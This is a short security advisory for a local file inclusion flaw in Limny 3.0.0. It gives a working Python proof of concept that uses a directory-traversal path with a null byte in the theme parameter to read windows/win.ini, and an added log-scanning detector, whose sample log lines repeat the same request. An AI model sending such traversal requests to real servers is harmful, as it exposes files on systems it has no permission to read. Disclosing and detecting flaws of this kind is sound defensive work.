Limny 3.0.0 Local File Inclusion

Description

A local file inclusion vulnerability in Limny 3.0.0 can be exploited to include arbitrary files.

Proof Of Concept

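import http.client

host = 'localhost'
path = '/limny-3.0.0'

# theme carries 32 URL-encoded "../" sequences followed by the file to include;
# the trailing %00 is a null byte placed after the file name.
c = http.client.HTTPConnection(host)
c.request('GET', path + '/admin/preview.php?theme=' + '..%2F' * 32 + 'windows/win.ini%00')
r = c.getresponse()

print(r.status, r.reason)
print(r.read().decode(errors='replace'))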
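
Detection sketch for the request shown above, added here as an example and not part of the original advisory or of Limny: it scans web server access-log lines for requests to admin/preview.php whose theme parameter contains directory traversal or a null byte. The log lines are constructed samples, the names classify_theme and scan are hypothetical, and the rule that a legitimate theme name is a short alphanumeric token is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
SAFE_THEME_RE = re.compile(r'^[A-Za-z0-9_-]{1,64}$')  # assumed naming rule

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /limny-3.0.0/admin/preview.php?theme=default HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /limny-3.0.0/admin/preview.php?theme=..%2F..%2F..%2Fwindows/win.ini%00 HTTP/1.1" 200 92',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /limny-3.0.0/index.php HTTP/1.1" 200 2048',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable, since logs may record a value encoded more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_theme(raw_value):
    """Return the reasons a theme value is suspicious (empty list if it looks normal)."""
    value = fully_decode(raw_value)
    reasons = []
    if '\x00' in value:
        reasons.append('null-byte')
    if TRAVERSAL_RE.search(value):
        reasons.append('traversal')
    if not reasons and not SAFE_THEME_RE.match(value):
        reasons.append('unexpected-characters')
    return reasons

def scan(log_lines):
    """Yield (line_number, reasons) for preview.php requests with a suspicious theme."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.endswith('/admin/preview.php'):
            continue
        # Split the raw query by hand so the still-encoded value reaches fully_decode.
        for pair in url.query.split('&'):
            name, _, raw = pair.partition('=')
            reasons = classify_theme(raw) if name == 'theme' else []
            if reasons:
                yield number, reasons
```

Calling list(scan(SAMPLE_LOG)) flags only the second line, the one shaped like the proof-of-concept request.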


Copyright © 2018 AutoSec Tools LLC